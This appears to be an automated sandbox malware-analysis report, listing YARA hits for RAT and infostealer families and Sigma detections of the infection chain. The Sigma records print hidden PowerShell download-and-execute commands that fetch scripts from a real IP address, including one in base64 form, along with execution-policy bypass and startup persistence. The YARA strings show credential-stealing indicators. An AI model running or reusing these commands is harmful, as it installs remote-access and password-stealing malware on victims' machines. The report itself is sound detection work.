8.2.powershell.exe.6076822.5.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16ebc2:$str01: Processe: 0x16ea7e:$str02: Compname: 0x16eb78:$str04: SandBoxie: 0x16eb0e:$str08: WEBCAMS COUNT: 0x16eb32:$str09: [Virtualization] 0x16f380:$str10: [Open google maps]( 0x170df7:$str11: Remember password: 0x163eea:$str12: Target.Browsers.Firefox 0x14b665:$str13: Modules.Keylogger 0x153528:$str14: ClipperAddresses 0x1556cd:$str15: ChromiumPswPaths 0x1556df:$str15: ChromiumPswPaths 0x151622:$str16: DetectedBankingServices 0x15178b:$str17: DetectCryptocurrencyServices 0x15f684:$str18: CheckRemoteDebuggerPresent 0x160609:$str19: GetConnectedCamerasCount
8.2.powershell.exe.6076822.5.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x12ebe8:$str01: set_sUsername 0x13c11a:$str03: set_sExpMonth 0x1514d5:$str04: WritePasswords 0x151f8f:$str05: WriteCookies 0x1556de:$str06: sChromiumPswPaths 0x1556b9:$str07: sGeckoBrowserPaths 0x16ad65:$str10: encrypted_key":"(.*?)"
8.2.powershell.exe.6076822.5.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bcd8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167da8:$str04: Pac_ket 0x177aee:$str05: Perfor_mance 0x177b32:$str06: Install_ed 0x12219b:$str07: get_IsConnected 0x138660:$str08: get_ActivatePo_ng 0x14c59b:$str09: isVM_by_wim_temper 0x1783e0:$str10: save_Plugin 0x1684c8:$str11: timeout 3 > NUL 0x1776ce:$str12: ProcessHacker.exe 0x1778c0:$str13: Select * from Win32_CacheMemory
8.2.powershell.exe.6076822.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bcd8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc3b:$s2: L2Mgc2NodGFza3MgL2
8.2.powershell.exe.6076822.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x1778c0:$q1: Select * from Win32_CacheMemory 0x177900:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x17794e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x17799c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
8.2.powershell.exe.6076822.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fa9c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
8.2.powershell.exe.6076822.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175437:$s1: \VPN\NordVPN 0x17541d:$s2: \VPN\OpenVPN 0x1753ff:$s3: \VPN\ProtonVPN
8.2.powershell.exe.6076822.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a181:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a1f3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a27d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a30f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a379:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a3eb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a481:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a511:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.powershell.exe.6076822.5.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d38:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163eac:$s6: VirtualBox 0x173a2b:$s6: VirtualBox 0x16f448:$s8: Win32_ComputerSystem 0x173991:$s8: Win32_ComputerSystem 0x16c574:$s9: Win32_Process Where ParentProcessID= 0x16c191:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c22e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c343:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c42b:$cnc4: POST / HTTP/1.1
8.2.powershell.exe.6342ad8.7.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
8.2.powershell.exe.6342ad8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.powershell.exe.6342ad8.7.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
8.2.powershell.exe.6342ad8.7.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
8.2.powershell.exe.6342ad8.7.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x23f608:$a1: havecamera 0x28a432:$a2: timeout 3 > NUL 0x28d7b5:$a3: START "" " 0x28dcca:$a3: START "" " 0x28dba5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28dc42:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
8.2.powershell.exe.6342ad8.7.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x290b2c:$str01: Processe: 0x2909e8:$str02: Compname: 0x290ae2:$str04: SandBoxie: 0x290a78:$str08: WEBCAMS COUNT: 0x290a9c:$str09: [Virtualization] 0x2912ea:$str10: [Open google maps]( 0x292d61:$str11: Remember password: 0x285e54:$str12: Target.Browsers.Firefox 0x26d5cf:$str13: Modules.Keylogger 0x275492:$str14: ClipperAddresses 0x277637:$str15: ChromiumPswPaths 0x277649:$str15: ChromiumPswPaths 0x27358c:$str16: DetectedBankingServices 0x2736f5:$str17: DetectCryptocurrencyServices 0x2815ee:$str18: CheckRemoteDebuggerPresent 0x282573:$str19: GetConnectedCamerasCount
8.2.powershell.exe.6342ad8.7.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x250b52:$str01: set_sUsername 0x25e084:$str03: set_sExpMonth 0x27343f:$str04: WritePasswords 0x273ef9:$str05: WriteCookies 0x277648:$str06: sChromiumPswPaths 0x277623:$str07: sGeckoBrowserPaths 0x28cccf:$str10: encrypted_key":"(.*?)"
8.2.powershell.exe.6342ad8.7.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x28dc42:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x289d12:$str04: Pac_ket 0x299a58:$str05: Perfor_mance 0x299a9c:$str06: Install_ed 0x244105:$str07: get_IsConnected 0x25a5ca:$str08: get_ActivatePo_ng 0x26e505:$str09: isVM_by_wim_temper 0x29a34a:$str10: save_Plugin 0x28a432:$str11: timeout 3 > NUL 0x299638:$str12: ProcessHacker.exe 0x29982a:$str13: Select * from Win32_CacheMemory
8.2.powershell.exe.6342ad8.7.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x28dc42:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x28dba5:$s2: L2Mgc2NodGFza3MgL2
8.2.powershell.exe.6342ad8.7.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x29982a:$q1: Select * from Win32_CacheMemory 0x29986a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x2998b8:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x299906:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
8.2.powershell.exe.6342ad8.7.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x291a06:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
8.2.powershell.exe.6342ad8.7.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2973a1:$s1: \VPN\NordVPN 0x297387:$s2: \VPN\OpenVPN 0x297369:$s3: \VPN\ProtonVPN
8.2.powershell.exe.6342ad8.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x28c0eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x28c15d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x28c1e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x28c279:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x28c2e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x28c355:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x28c3eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x28c47b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.powershell.exe.6342ad8.7.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x289ca2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x285e16:$s6: VirtualBox 0x295995:$s6: VirtualBox 0x2913b2:$s8: Win32_ComputerSystem 0x2958fb:$s8: Win32_ComputerSystem 0x28e4de:$s9: Win32_Process Where ParentProcessID= 0x28e0fb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28e198:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28e2ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x28e395:$cnc4: POST / HTTP/1.1
8.2.powershell.exe.6342ad8.7.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
8.2.powershell.exe.6342ad8.7.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
8.2.powershell.exe.6342ad8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.powershell.exe.6342ad8.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.powershell.exe.6342ad8.7.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
8.2.powershell.exe.6342ad8.7.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
8.2.powershell.exe.6342ad8.7.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x241408:$a1: havecamera 0x28c232:$a2: timeout 3 > NUL 0x28f5b5:$a3: START "" " 0x28faca:$a3: START "" " 0x28f9a5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28fa42:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
8.2.powershell.exe.6342ad8.7.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x29292c:$str01: Processe: 0x2927e8:$str02: Compname: 0x2928e2:$str04: SandBoxie: 0x292878:$str08: WEBCAMS COUNT: 0x29289c:$str09: [Virtualization] 0x2930ea:$str10: [Open google maps]( 0x294b61:$str11: Remember password: 0x287c54:$str12: Target.Browsers.Firefox 0x26f3cf:$str13: Modules.Keylogger 0x277292:$str14: ClipperAddresses 0x279437:$str15: ChromiumPswPaths 0x279449:$str15: ChromiumPswPaths 0x27538c:$str16: DetectedBankingServices 0x2754f5:$str17: DetectCryptocurrencyServices 0x2833ee:$str18: CheckRemoteDebuggerPresent 0x284373:$str19: GetConnectedCamerasCount
8.2.powershell.exe.6342ad8.7.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x5db:$sk01: LimerBoy/StormKitty 0x252952:$str01: set_sUsername 0x25fe84:$str03: set_sExpMonth 0x27523f:$str04: WritePasswords 0x275cf9:$str05: WriteCookies 0x279448:$str06: sChromiumPswPaths 0x279423:$str07: sGeckoBrowserPaths 0x28eacf:$str10: encrypted_key":"(.*?)"
8.2.powershell.exe.6342ad8.7.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x28fa42:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x28bb12:$str04: Pac_ket 0x29b858:$str05: Perfor_mance 0x29b89c:$str06: Install_ed 0x245f05:$str07: get_IsConnected 0x25c3ca:$str08: get_ActivatePo_ng 0x270305:$str09: isVM_by_wim_temper 0x29c14a:$str10: save_Plugin 0x28c232:$str11: timeout 3 > NUL 0x29b438:$str12: ProcessHacker.exe 0x29b62a:$str13: Select * from Win32_CacheMemory
8.2.powershell.exe.6342ad8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x28fa42:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x28f9a5:$s2: L2Mgc2NodGFza3MgL2
8.2.powershell.exe.6342ad8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x29b62a:$q1: Select * from Win32_CacheMemory 0x29b66a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x29b6b8:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x29b706:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
8.2.powershell.exe.6342ad8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x293806:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
8.2.powershell.exe.6342ad8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2991a1:$s1: \VPN\NordVPN 0x299187:$s2: \VPN\OpenVPN 0x299169:$s3: \VPN\ProtonVPN
8.2.powershell.exe.6342ad8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x28deeb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x28df5d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x28dfe7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x28e079:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x28e0e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x28e155:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x28e1eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x28e27b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.powershell.exe.6342ad8.7.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty 0x27dff4:$s2: GetAntivirus 0x29405a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x28d4a5:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x28eacd:$s6: "encrypted_key":"(.*?)"
8.2.powershell.exe.6342ad8.7.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28baa2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x287c16:$s6: VirtualBox 0x297795:$s6: VirtualBox 0x2931b2:$s8: Win32_ComputerSystem 0x2976fb:$s8: Win32_ComputerSystem 0x2902de:$s9: Win32_Process Where ParentProcessID= 0x28fefb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28ff98:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2900ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x290195:$cnc4: POST / HTTP/1.1
Click to see the 63 entries

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\Temp\Package.exe, ParentImage: C:\Windows\Temp\Package.exe, ParentProcessId: 2972, ParentProcessName: Package.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ProcessId: 5468, ProcessName: cmd.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", ProcessId: 3200, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2276, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", ProcessId: 7196, ProcessName: csc.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3200, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA, ProcessId: 2180, ProcessName: powershell.exe

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5468, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ProcessId: 2276, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\Temp\Package.exe, ParentImage: C:\Windows\Temp\Package.exe, ParentProcessId: 2972, ParentProcessName: Package.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ProcessId: 5468, ProcessName: cmd.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2276, TargetFilename: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", ProcessId: 3200, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2180, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

